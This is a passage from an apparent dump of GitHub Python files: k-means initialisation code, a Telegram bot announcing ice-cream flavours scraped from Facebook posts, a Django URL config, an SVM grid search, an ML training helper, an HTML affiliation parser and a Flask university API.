each data point\n distances = []\n totalDistance = 0\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances [:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick the nearest cluster for the current data point\n minDistances.append([Statics.data.index(datapoint), min(distances)])\n totalDistance += min(distances)\n\n # Fill a cummulative list, 0 to 1, with appropiate probabilities, which is used to pick the new centroid by weighted probability\n cumProbabilities = []\n previousProb = 0\n for minDistance in minDistances:\n probability = (minDistance[1]/totalDistance) * 100\n if minDistance == minDistances[0]:\n cumProbabilities.append([minDistance[0], probability])\n else:\n cumProbabilities.append([minDistance[0], previousProb + probability])\n previousProb += probability\n\n r = ran.uniform(0.0, 100.0)\n for cumProbability in cumProbabilities:\n if r < cumProbability[1]:\n centroids.append(Statics.data[cumProbability[0]])\n break\n\n return centroids\n\n # Picks points as far away from each other as possible as initial clusters\n def initializeSpread(self, k):\n centroids = []\n\n # Get minimum values for all dimensions and use these as first centroid\n minimumValues = []\n for dataPoint in Statics.data:\n if dataPoint == Statics.data[0]:\n for dimension in range(0, len(dataPoint)):\n minimumValues.append(dataPoint[dimension])\n else:\n for dimension in range(0, len(dataPoint)):\n if dataPoint[dimension] < minimumValues[dimension]:\n minimumValues[dimension] = dataPoint[dimension]\n centroids.append(minimumValues)\n\n # Calculate all distances from data points to their nearest cluster\n for cluster in range(1, k):\n # Calculate distance to nearest centroid for each data point\n minDistances = 
[] # Holds the distances to the nearest centroid for each data point\n distances = []\n\n for datapoint in Statics.data:\n # Store distances to all clusters and pick nearest from this\n distances[:] = []\n\n for centroid in centroids:\n distances.append(self.calculate_LDistance(datapoint, centroid, 2))\n\n # Pick closest cluster for the current data point\n minDistances.append(sum(distances))\n\n # Select the data point of which its nearest cluster is the furthest away, and use this as the new centroid\n centroids.append(Statics.data[minDistances.index(max(minDistances))])\n\n return centroids\n\n def calculate_LDistance (self, currentData, currentCentroid, lNorm):\n return pow(sum([pow(abs(currentData - currentCentroid),lNorm) for currentData, currentCentroid in zip(currentData, currentCentroid)]),(1/lNorm))\n\n def calculate_ChebyshevDistance (self, currentData, currentCentroid):\n return max([abs(currentData - currentCentroid) for currentData, currentCentroid in zip(currentData, currentCentroid)])\n\n # assigns data points to the nearest centroid\n def assign_Centroid(self, centroids, k):\n distance = []\n cluster = []\n j=0\n while (j None:\n username = update.effective_user.username\n if username in data:\n context.bot.sendMessage(text=already_registered, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n data[username] = User(username=username)\n write_data_to_file(data)\n context.bot.sendMessage(text=successfully_registered, chat_id=update.effective_user.id)\n\n\ndef configure(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/configure\", \"\").lstrip()\n if not token:\n return\n data.get(username).page_url = token\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Updated subscribed shop.\", chat_id=update.effective_user.id)\n\n\ndef add(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n token = update.message.text.replace(\"/add\", \"\").lstrip()\n if not token:\n return\n if token.lower() not in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.append(token.lower())\n write_data_to_file(data)\n message = str(\"Now watching out for: {}\").format(token.capitalize())\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n\n\ndef remove(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n message = update.message.text.replace(\"/remove\", \"\").lstrip()\n if not message:\n return\n if message.lower() in data.get(username).ice_cream_flavors:\n data.get(username).ice_cream_flavors.remove(message.lower())\n write_data_to_file(data)\n context.bot.sendMessage(text=\"Removed {}\".format(message.capitalize()), chat_id=update.effective_user.id)\n\n\ndef post(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_post() is not None:\n context.bot.sendMessage(text=get_post(), 
chat_id=update.effective_user.id)\n\n\ndef list_flavors(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(data.get(username).ice_cream_flavors) > 0:\n message: str = \"\"\n for flavor in data.get(username).ice_cream_flavors:\n message += flavor.capitalize() + \"\\n\"\n context.bot.sendMessage(text=message, chat_id=update.effective_user.id)\n else:\n context.bot.sendMessage(text=watching_no_flavors, chat_id=update.effective_user.id)\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n context.bot.sendMessage(text=help_message, chat_id=update.effective_user.id)\n\n\ndef get_update(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if get_available_message(username) is not None:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=get_available_message(username))\n\n\ndef start_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) != 0:\n context.bot.sendMessage(chat_id=update.message.chat_id, text=\"Already subscribed to notifications.\")\n return\n time = datetime.time(10, 20, 00)\n args = {\"username\": username,\n \"chat_id\": update.message.chat_id}\n context.job_queue.run_daily(\n callback=notify_job,\n time=time,\n days=tuple(range(7)),\n context=args,\n name=username)\n context.bot.sendMessage(text=\"You'll get notified at {} UTC.\".format(time.isoformat(timespec=\"minutes\")),\n chat_id=update.effective_user.id)\n\n\ndef stop_notify(update: Update, context: CallbackContext) -> None:\n username = update.effective_user.username\n if username not in data:\n context.bot.sendMessage(text=register_first, chat_id=update.effective_user.id)\n return\n if len(context.job_queue.get_jobs_by_name(username)) == 0:\n context.bot.sendMessage(text=\"You are not subscribed to notifications yet.\", chat_id=update.effective_user.id)\n return\n context.job_queue.get_jobs_by_name(username)[0].schedule_removal()\n context.bot.sendMessage(text=\"You'll not get notified any longer.\", chat_id=update.effective_user.id)\n\n\ndef notify_job(context):\n if get_available_message(context.job.context.get(\"username\")) is not None:\n context.bot.sendMessage(chat_id=context.job.context.get(\"chat_id\"),\n text=get_available_message(context.job.context.get(\"username\")))\n\n\ndef get_available_message(username: str) -> str or None:\n if username not in data:\n return None\n post = get_post()\n available_flavors: list[str] = list()\n user: User = data.get(username)\n for flavor in user.ice_cream_flavors:\n if user.page_url.casefold() == \"both\".casefold():\n if flavor.casefold() in post.casefold():\n available_flavors.append(flavor)\n elif \"Lindenhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Lindenhof((?:.|\\s)*?)Limburgerhof\", post,\n flags=re.IGNORECASE).group(1) \\\n or \"Limburgerhof\".casefold() == user.page_url.casefold() \\\n and flavor.casefold() in re.search(\"Limburgerhof((?:.|\\s)*?)$\", post, flags=re.IGNORECASE).group(1):\n available_flavors.append(flavor)\n if len(available_flavors) > 0:\n 
return \"The following flavors are available today: {}\".format(', '.join(available_flavors))\n\n\ndef get_post() -> str:\n date_today = datetime.date.today()\n cache_date = cache[\"cache_date\"]\n cache_text = cache[\"cache_text\"]\n if cache_date is not None and cache_date == date_today:\n return cache_text.casefold()\n else:\n posts = get_posts(\"eismanufakturzeitgeist\", pages=1, cookies=config['Cookies']['path-to-cookies'])\n for post in posts:\n if post['time'].date() == date_today:\n cache[\"cache_text\"] = post['text']\n cache[\"cache_date\"] = date_today\n return cache[\"cache_text\"].casefold()\n\n\ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(config['Telegram']['bot-token'])\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"add\", add))\n dispatcher.add_handler(CommandHandler(\"remove\", remove))\n dispatcher.add_handler(CommandHandler(\"list\", list_flavors))\n dispatcher.add_handler(CommandHandler(\"configure\", configure))\n dispatcher.add_handler(CommandHandler(\"update\", get_update))\n dispatcher.add_handler(CommandHandler(\"post\", post))\n dispatcher.add_handler(CommandHandler(\"start_notify\", start_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"stop_notify\", stop_notify, pass_job_queue=True))\n dispatcher.add_handler(CommandHandler(\"help\", help))\n\n # on non command i.e message - echo the message on Telegram\n # dispatcher.add_handler(MessageHandler(Filters.text & ~Filters.command, echo))\n\n # Start the Bot\n updater.start_polling()\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RatzzFatzz/zeitgeist-notifier","sub_path":"src/facebook_notifier.py","file_name":"facebook_notifier.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3668436398","text":"#-*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom perso.views import create_error_view\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^namegen/', include(\"namegen.urls\")),\n url(r'^dynimg/', include(\"dynimg.urls\")),\n url(r'^playel/', include(\"playel.urls\")),\n url(r'^profs/', include(\"profs.urls\")),\n url(r'^avatar/', include(\"avatar.urls\")),\n url(r'^quotes/', include(\"quotes.urls\")),\n url(r'^register/', include(\"register.urls\")),\n url(r'^blog/', include(\"perso.urls\")),\n url(r'^', include(\"portfolio.urls\")),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n import debug_toolbar\n urlpatterns = [\n url(r'^__debug__/', include(debug_toolbar.urls))\n ] + urlpatterns\n\nhandler400 = create_error_view(code=400)\nhandler403 = create_error_view(code=403)\nhandler404 = create_error_view(code=404)\nhandler500 = create_error_view(code=500)\n","repo_name":"crazy-djactor/LMinaw","sub_path":"leminaw/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"72152699847","text":"\"\"\"\nTreći dio: Support Vector Machine\nPotrebno je provesti pretraživanje po rešetki nad hiperparametrima C i gamma kako bi se dobile optimalne vrijednosti\nza sve setove podataka. Očekuje se da će oni biti malo drugačiji za različite setove.\nC - dozvoljena pogreška klasifikacije; obrnuto proporcionalna jačina regularizacije lambda, C=1/lambda\ngamma - koef. jezgre za rbf, poly i sigmoidalnu funkciju.\nAnaliza će se provjeriti posebno za 3 jezgrene funkcije: rbf, poly i linear.\nNa kraju će se rezultati zapisati u excel datoteke posebno za svaki set podataka, u svakoj za sve 3 jezgrene funkcije.\n\n\"\"\"\n\n\nfrom Preprocessing import input_data, output_data\n# Ukoliko se žele stvarati novi podaci svaku skriptu, ovo NE treba biti zakomentirano\nfrom Preprocessing import divided_train_data, all_X_test_data\n\nimport openpyxl, pickle, os, shutil\nimport pandas as pd\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\n\noutput_SVM = output_data+\"C_SVM/\"\n\nwith open(input_data+'/divided_train_data.pickle', 'rb') as f_X_train:\n divided_train_data = pickle.load(f_X_train)\nwith open(input_data+'/all_X_test_data.pickle', 'rb') as f_test:\n all_X_test_data = pickle.load(f_test)\n\ntry:\n shutil.rmtree(output_SVM)\nexcept:\n FileNotFoundError\nos.mkdir(output_SVM)\n\n\n# Velika SVM funkcija koja računa točnost za rbf, poly i linear jezgrene funkcije z sve data setove\ndef grid_search(data_name, X_train, Y_train, X_valid, Y_valid):\n\n # Pomoćna funkcija koja ispisuje koliko je gotovo simulacija od ukupnog broja\n def current_sim_number(c,gamma, C_range, gamma_range):\n m = C_range.index(c)\n n = gamma_range.index(gamma) # indexi trenutnog položaja\n\n num = n * len(C_range) + m +1 # number of simulation\n percentage_over = num / (len(C_range) * len(gamma_range))\n percentage_over_str = (str(num) + \"/\" + str(len(C_range) * len(gamma_range)))\n print(percentage_over_str)\n return percentage_over\n\n\n # Postavljanje hiperparametara i excel datoteke za spremanje pretraživanja\n xlsx_name = output_SVM+\"Acc_SVM_\"+data_name+\".xlsx\" # ime excel file u koji se spremaju rezultati, kasnije\n Acc_grid_search = pd.ExcelWriter(xlsx_name) # stvaranje excela\n C_range = range(-10, -3) # rang baze za C\n gamma_range = range(-20, -5)\n C_f = lambda m: 2 ** m # Funkcije za računanje C i gamma\n gamma_f = lambda n: 2 ** n\n best_grid_acc = {\"radial_base\":[], \"poly\":[], \"linear\":[]}\n\n\n # SVM s radijalnom baznom funkcijom\n def radial_base_function():\n accuracity_matrix = {}\n max_acc = 0 # inicijalno postavljanje najbolje točnosti i array-project_data pozicija\n\n for gamma_ in gamma_range: # Pretraživanje za jedan red (C=..)\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = [] # Rezultati se spremaju u matricu\n\n for c_ in C_range: # Pretraživanje za jedan stupac (gamma=..)\n svcModel = SVC(C=C_f(c_), kernel=\"rbf\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"radial_base\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range.index(gamma_), C_range.index(c_)\n 
best_grid_acc[\"radial_base\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n current_sim_number(c_, gamma_, C_range, gamma_range) # ispisuje gotove simulacije\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range] # imena indexa DataFrame-project_data, gamma=.. podaci\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n\n # Redovi su vrijednosti C, kolone vrijednosti gamma\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"radial_base\", startcol=0, startrow=0)\n\n radial_base_function()\n\n\n\n # Polinomijalna bazna funkcija\n def poly_function():\n C_range_poly = range(-15, -5)\n gamma_range_poly = range(-15, -5)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_poly:\n gamma_str = \"{:.2e}\".format(gamma_f(gamma_))\n accuracity_matrix[gamma_str] = []\n\n for c_ in C_range_poly:\n svcModel = SVC(C=C_f(c_), kernel=\"poly\", gamma=gamma_f(gamma_))\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n current_sim_number(c_, gamma_, C_range_poly, gamma_range_poly)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"poly\"] = [[n_C, n_gamma]]\n\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_poly.index(gamma_), C_range_poly.index(c_)\n best_grid_acc[\"poly\"].append([n_C, n_gamma])\n\n accuracity_matrix[gamma_str].append([acc_train, acc_valid]) # punjenje stupaca DataFrame-project_data\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_poly]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"poly\", startcol=0, startrow=0)\n\n poly_function()\n\n\n\n\n def linear_function():\n gamma_range_linear = [1]\n C_range_linear = range(-15, -3)\n\n accuracity_matrix = {}\n max_acc = 0\n for gamma_ in gamma_range_linear:\n accuracity_matrix[1] = []\n\n for c_ in C_range_linear:\n svcModel = SVC(C=C_f(c_), kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n prediction = svcModel.predict(X_valid)\n acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n accuracity_matrix[1].append([acc_train, acc_valid])\n current_sim_number(c_, gamma_, C_range_linear, gamma_range_linear)\n\n if acc_valid > max_acc: # traženje najbolje točnosti\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n max_acc = acc_valid\n best_grid_acc[\"linear\"] = [[n_C, n_gamma]]\n elif acc_valid == max_acc: # nadopunjavanje array-project_data za naj točnost\n n_gamma, n_C = gamma_range_linear.index(gamma_), C_range_linear.index(c_)\n best_grid_acc[\"linear\"].append([n_C, n_gamma])\n\n ind_names = [\"{:.2e}\".format(C_f(i)) for i in C_range_linear]\n accuracity_matrix = pd.DataFrame(accuracity_matrix, index=ind_names)\n accuracity_matrix.to_excel(Acc_grid_search, sheet_name=\"linear\", startcol=0, startrow=0) # Redovi su vrijednosti C, kolone vrijednosti gamma\n\n linear_function()\n\n\n Acc_grid_search.save() # Spremanje DF u excel file\n workbook=openpyxl.load_workbook(xlsx_name)\n\n # Otvara sve sheetove ovisno o rječniku gdje su spremljeni podaci\n for kernel_function in 
best_grid_acc.keys(): # iterira riječnik sa svim podacima točnosti\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).value = \"C/gamma\" # ispis u ćeliju\n workbook.get_sheet_by_name(kernel_function).cell(row=1, column=1).fill = \\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FFFF00\") # bojanje oznaka gamma, C\n\n # Iteracija po zapisanim koordinatama gdje se nalazi maksimalna točnost modela\n for position in best_grid_acc[kernel_function]:\n workbook.get_sheet_by_name(kernel_function).cell(row=2+position[0], column=2+position[1]).fill =\\\n openpyxl.styles.PatternFill(\"solid\", fgColor=\"00FF0000\")\n\n workbook.save(xlsx_name)\n\n\n####################################################################################################################\n\n# Iteracija po svim podacima spremljenim u pickle\nfor data_name in divided_train_data[\"X_train_data\"]:\n\n X_train = divided_train_data[\"X_train_data\"][data_name]\n Y_train = divided_train_data[\"Y_train_data\"][data_name]\n X_valid = divided_train_data[\"X_valid_data\"][data_name]\n Y_valid = divided_train_data[\"Y_valid_data\"][data_name]\n\n grid_search(data_name, X_train, Y_train, X_valid, Y_valid) # provodi cijelu analizu i izbacuje excel\n\n\n\n\n####################################################################################################################\n\n\n\n\n\n\n\"\"\"\nZaključak:\n\n - Model s početnim vrijenostima hiperparametara pokazuje najveću točnost za RBF jezgrenu funkciju. Daljnim \n podešavanjem hiperparametara moguće je postići veću točnost i za druge jezgre. Negativna stvar je da za \n veće vrijednosti hiperparametara modeli osjetno sporije konvergiraju te je potreban kompromis. \n \n\n -Nakon provedene analize zaključuje se da su veće vrijednosti hiperparametara optimalne (C=100, gamma=) te su \n također i stabilnije i ustaljene točnosti. C=1, gamma=1 su vrijednosti hiperparametara za koje model s \n osnovnim podacima ima općenito najveću točnost. 
\n \n -Rezultati pravilno konvergiraju rješenju kada se vrijednosti hiperparametara mijenjaju po kvadratnoj funkciji.\n \n -Modeli s drugim podacima i funkcijama imaju istu maksimalnu točnost, ALI se do nje može brže doći promjenom HP.\n -> pogotovo kod korištenja poly jezgrene funkcije\n \n -Vjerojatno se točnost kod poly modela može još malo podići uz dosta veću računalnu zahtjevnost - neisplativo\n\n\n\n\n # za čiste podatke odabrano:\n 0.5 / 0.125 - teško točno pogoditi jer se mijenjaju od seta do seta podataka\n\n # poly4: stabilniji rezultati\n 0.25/3e-6\n\n\"\"\"\n\n\n\n\n\n\n\n\n\n# Funkcija koja ispisuje tablicu s koeficijentima korelacije (vaćnost svake kategorije za predviđanje)\ndef SVC_coeffs():\n\n X_train = divided_train_data[\"X_train_data\"][\"X\"]\n Y_train = divided_train_data[\"Y_train_data\"][\"X\"]\n X_valid = divided_train_data[\"X_valid_data\"][\"X\"]\n Y_valid = divided_train_data[\"Y_valid_data\"][\"X\"]\n\n # svcModel = SVC(C=0.5, kernel=\"rbf\", gamma=0.125)\n svcModel = SVC(C=33, kernel=\"linear\")\n svcModel.fit(X_train, Y_train)\n # acc_train = round(svcModel.score(X_train, Y_train) * 100, 2)\n # prediction = svcModel.predict(X_valid)\n # acc_valid = round(accuracy_score(prediction, Y_valid) * 100, 2)\n\n\n\n coeff_df = pd.DataFrame(X_train.columns)\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(svcModel.coef_[0])\n coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n coeff_df = coeff_df.reset_index(drop=True)\n\n print(coeff_df)\n\n return coeff_df\n\n\nSVC_coeffs()\n\n\n # coeff_df = pd.DataFrame(train_X.columns)\n # coeff_df.columns = ['Feature']\n # coeff_df[\"Correlation\"] = pd.Series(svc.coef_[0])\n # coeff_df = coeff_df.sort_values(by='Correlation', key=abs, ascending=False)\n # coeff_df = coeff_df.reset_index(drop=True)","repo_name":"jzivic/Titanic_project","sub_path":"SVM.py","file_name":"SVM.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
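A minimal sketch, not taken from the Titanic_project record above: the same exponential C/gamma sweep that SVM.py drives with nested loops can be expressed with scikit-learn's GridSearchCV. X_train and Y_train stand for the pre-split arrays the script loads from its pickle; the grid bounds are illustrative.

from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC

param_grid = {
    "C": [2.0 ** i for i in range(-5, 16, 2)],       # exponential grid, as in the script
    "gamma": [2.0 ** i for i in range(-15, 4, 2)],
    "kernel": ["rbf"],
}
search = GridSearchCV(SVC(), param_grid, scoring="accuracy", cv=5, n_jobs=-1)
search.fit(X_train, Y_train)                          # X_train / Y_train: assumed pre-split data
print(search.best_params_, search.best_score_)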
+{"seq_id":"70784761288","text":"import logging\nfrom dataclasses import dataclass\n\nimport pandas as pd\nfrom lit_ds_utils.decorate.logging import log_function\nfrom sklearn.model_selection import train_test_split\n\nfrom .. import settings\nfrom ..config.constants import (\n DATABRICKS_EXPERIMENT_NAME,\n DATABRICKS_GROUP_NAME,\n DATABRICKS_REGISTERED_MODEL_NAME,\n MODEL_ARTIFACT,\n)\nfrom ..utils.utils import save_local_artifact\nfrom .build import build_model\nfrom .log_model import wrap_and_log_model\n\nlogger = logging.getLogger(__name__)\n\nEXPERIMENT_NAME = settings.str(DATABRICKS_EXPERIMENT_NAME)\nMODEL_NAME = settings.str(DATABRICKS_REGISTERED_MODEL_NAME)\nGROUP_NAME = settings.str(DATABRICKS_GROUP_NAME)\n\n\n@dataclass()\nclass TrainTestSplits:\n \"\"\"Train, test and holdout splits.\"\"\"\n\n train_df: pd.DataFrame\n test_df: pd.DataFrame\n\n\n@log_function()\ndef train_and_log_model(train_df: pd.DataFrame, test_df: pd.DataFrame) -> None:\n \"\"\"Run an ML Flow experiment and log to databricks using the args sent in.\n\n Args:\n train_df: Train df\n test_df: Test df.\n \"\"\"\n logger.info(\"Building model\")\n model = build_model(train_df=train_df)\n save_local_artifact(MODEL_ARTIFACT, model)\n\n logger.info(\"Logging model to MLFlow\")\n wrap_and_log_model(model, test_df=test_df)\n\n\n@log_function()\ndef get_train_test_splits(input_df: pd.DataFrame) -> TrainTestSplits:\n \"\"\"Split the supplied data into training, test and holdout splits.\n\n Args:\n input_df: The dataframe to split.\n\n Returns:\n The train, test and holdout splits.\n \"\"\"\n\n train_df = input_df[input_df['policy_year'] < 2017]\n test_df = input_df[input_df['policy_year'] == 2017]\n\n return TrainTestSplits(train_df, test_df)\n","repo_name":"judemd/ml-playground","sub_path":"ml-template-main/pipeline/model/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36780865148","text":"import re, bs4, string\nfrom project.server.main.parsers.strings import get_clean_text\n\ndef parse_fallback_tags(soup, doi):\n\n res = {'doi': doi}\n affiliations = []\n affiliation_regex = re.compile(\"affili|institution\")\n potential_elts = []\n potential_elts += soup.find_all(id= affiliation_regex) \n potential_elts += soup.find_all(class_= affiliation_regex)\n\n potential_aff = []\n\n for p in potential_elts:\n current_name = get_clean_text(p)\n potential_aff.append(current_name)\n\n #for e in soup.find_all(\"sup\"):\n # if len(get_clean_text(e)) == 1:\n # potential_aff.append(get_clean_text(e.next.next))\n\n for current_name in potential_aff:\n for k in [\"Affiliation\", \"Author Information\"]:\n current_name = current_name.replace(k, \"\").strip()\n if current_name.startswith(';'):\n continue\n if len(current_name.split(' ')) < 2:\n continue\n if len(current_name) > 2:\n current_aff = {'name': current_name}\n if current_aff not in affiliations:\n affiliations.append(current_aff)\n if affiliations:\n res['affiliations'] = affiliations\n\n return res\n","repo_name":"dataesr/bso-parser-html","sub_path":"project/server/main/parsers/fallback_tags.py","file_name":"fallback_tags.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"11899500140","text":"from flask import Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom app.db import db\n\nfrom app.countries.models import Country\nfrom .models import University\n\n\nbp = Blueprint('universities', __name__, url_prefix='/universities')\n\n\nclass UniversityBaseView(MethodView):\n def is_column_unique(self, column, value): \n \"\"\"\n Example:\n 'world_rank', 98, \n 'name', 'Some university'\n \"\"\"\n return University.query.filter_by(**{column: value}).first() is None\n\n def is_name_unique(self, name):\n return University.query.filter_by(name=name).first() is None\n\n def get_country(self, country_id):\n return Country.query.filter_by(id=country_id).first()\n\n def validate_data(self, data):\n fields = {\n 'name': str,\n 'world_rank': int,\n 'score': float,\n 'country_id': int,\n }\n\n errors = {}\n for field, _type in fields.items():\n try:\n data[field] = _type(data[field])\n except (KeyError, TypeError, ValueError):\n errors[field] = 'invalid'\n \n return data, errors\n\n\nclass UniversityListCreateView(UniversityBaseView):\n def get(self):\n limit = 20\n\n rows = University.query.limit(limit)\n\n page = request.args.get('page', '1')\n if page and page.isnumeric():\n page = int(page)\n rows = rows.offset((page - 1) * limit)\n\n response = [{'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id} for row in rows]\n\n return jsonify(response)\n\n def post(self):\n data = request.json\n\n data, errors = self.validate_data(request.json)\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n if not self.is_column_unique('name', data['name']):\n errors['name'] = 'unique'\n \n if not self.is_column_unique('world_rank', data['world_rank']):\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n u = University(\n name=data['name'], \n world_rank=data['world_rank'], \n score=data['score'],\n country_id=data['country_id'],\n )\n db.session.add(u)\n db.session.commit()\n db.session.refresh(u)\n\n return jsonify({'id': u.id}), 201 # created\n\n\nclass UniversityDetailUpdateDeleteView(UniversityBaseView):\n def get_object_by_id(self, university_id):\n return University.query.filter_by(id=university_id).first()\n\n def get(self, university_id):\n row = self.get_object_by_id(university_id)\n if row is None:\n return jsonify({'error': 'not_found'}), 404\n\n return jsonify({'id': row.id, 'world_rank': row.world_rank, 'name': row.name, 'score': float(row.score), 'country_id': row.country_id})\n\n def put(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n \n data, errors = self.validate_data(request.json)\n \n if len(errors):\n return jsonify({'error': errors}), 400\n\n if University.query.filter(University.id != university_id).filter_by(name=data['name']).first():\n errors['name'] = 'unique'\n\n if University.query.filter(University.id != university_id).filter_by(world_rank=data['world_rank']).first():\n errors['world_rank'] = 'unique'\n\n if not self.get_country(data['country_id']):\n errors['country_id'] = 'invalid'\n\n if len(errors):\n return jsonify({'error': errors}), 400\n\n university.name=data['name']\n university.world_rank=data['world_rank']\n university.score=data['score']\n university.country_id=data['country_id']\n \n db.session.commit()\n\n 
return jsonify({'id': university.id}), 200 # created\n\n def delete(self, university_id):\n university = self.get_object_by_id(university_id)\n if university is None:\n return jsonify({'error': 'not_found'}), 404\n\n db.session.delete(university)\n db.session.commit()\n\n return jsonify({'deleted': 'ok'})\n\n\nbp.add_url_rule('/', view_func=UniversityListCreateView.as_view('universities'))\nbp.add_url_rule('//', view_func=UniversityDetailUpdateDeleteView.as_view('university'))\n","repo_name":"Argam431/RESTFULL-Api","sub_path":"app/universities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
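A hedged usage sketch for the blueprint above, exercising the list and create endpoints with Flask's test client. create_app is a hypothetical application factory; the real project may assemble its app differently.

from app import create_app   # hypothetical factory, adjust to the project's layout

app = create_app()
client = app.test_client()

# Paginated listing: ?page=2 skips the first 20 rows.
resp = client.get("/universities/?page=2")
print(resp.status_code, resp.get_json())

# Create: invalid or duplicate fields come back as {"error": {...}} with HTTP 400.
payload = {"name": "Example University", "world_rank": 999, "score": 55.4, "country_id": 1}
resp = client.post("/universities/", json=payload)
print(resp.status_code, resp.get_json())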
